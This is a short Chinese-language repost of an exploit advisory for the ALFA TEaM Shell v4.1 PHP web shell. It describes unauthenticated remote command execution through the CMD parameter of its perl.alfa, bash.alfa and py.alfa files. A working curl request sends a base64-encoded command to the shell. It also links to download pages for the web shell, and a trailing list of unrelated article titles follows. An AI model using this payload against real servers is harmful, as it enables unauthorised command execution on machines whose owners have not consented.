反制恶意软件ALFA TEAM SHELL TESLA 之 RCE
2023-04-18 16:07:14 时间
一个发布新版本 PHP web shell 的组织是ALFA TEaM,这是一个可疑的伊朗组织,该组织创建了ALFA TEaMShell等网络恶意软件,过去曾被APT 33等针对能源和航空航天行业的威胁行为者使用过在过去。如果您有兴趣,FireEye 已经记录了对APT 33组战术的详细分析。
供应商主页:http://solevisible.com
软件链接:https://phpshells.com/alfa-tesla-v4-1-shell
版本:v4.1
测试:Windows 10 Enterprise x64,Linux
[关于-阿尔法团队壳牌特斯拉]:
它是黑客使用的最流行的 web shell 之一,他们用它来访问服务器端。
[易受攻击的文件]:
1 . perl.alfa
2 . bash.alfa
3 . py.alfa
[易受攻击的参数]:CMD
[描述]: #执行命令无需身份验证或登录web shell, To use,只找到一个易受攻击的文件,
Convert your commands to base64 and Submit your request using the CMD parameter and the POST method.
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa
相关文章
- 【技术种草】cdn+轻量服务器+hugo=让博客“云原生”一下
- CLB运维&运营最佳实践 ---访问日志大洞察
- vnc方式登陆服务器
- 轻松学排序算法:眼睛直观感受几种常用排序算法
- 十二个经典的大数据项目
- 为什么使用 CDN 内容分发网络?
- 大数据——大数据默认端口号列表
- Weld 1.1.5.Final,JSR-299 的框架
- JavaFX 2012:彻底开源
- 提升as3程序性能的十大要点
- 通过凸面几何学进行独立于边际的在线多类学习
- 利用行动影响的规律性和部分已知的模型进行离线强化学习
- ModelLight:基于模型的交通信号控制的元强化学习
- 浅谈Visual Source Safe项目分支
- 基于先验知识的递归卡尔曼滤波的代理人联合状态和输入估计
- 结合网络结构和非线性恢复来提高声誉评估的性能
- 最佳实践丨云开发CloudBase多环境管理实践
- TimeVAE:用于生成多变量时间序列的变异自动编码器
- 具有线性阈值激活的神经网络:结构和算法
- 内网渗透之横向移动 -- 从域外向域内进行密码喷洒攻击